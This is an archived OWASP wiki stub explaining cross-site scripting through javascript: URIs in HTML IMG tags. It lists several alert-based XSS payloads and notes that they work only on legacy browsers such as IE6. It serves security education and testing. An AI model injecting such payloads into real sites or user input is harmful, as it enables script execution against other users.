This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit

Script in IMG tags

Revision as of 13:11, 19 May 2015 by Ryan Dewhurst (talk | contribs) (Add positive test result)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search


It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.


The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.

<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Related Threats

Related Attacks

XSS Attacks

Related Vulnerabilities

Related Countermeasures


This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.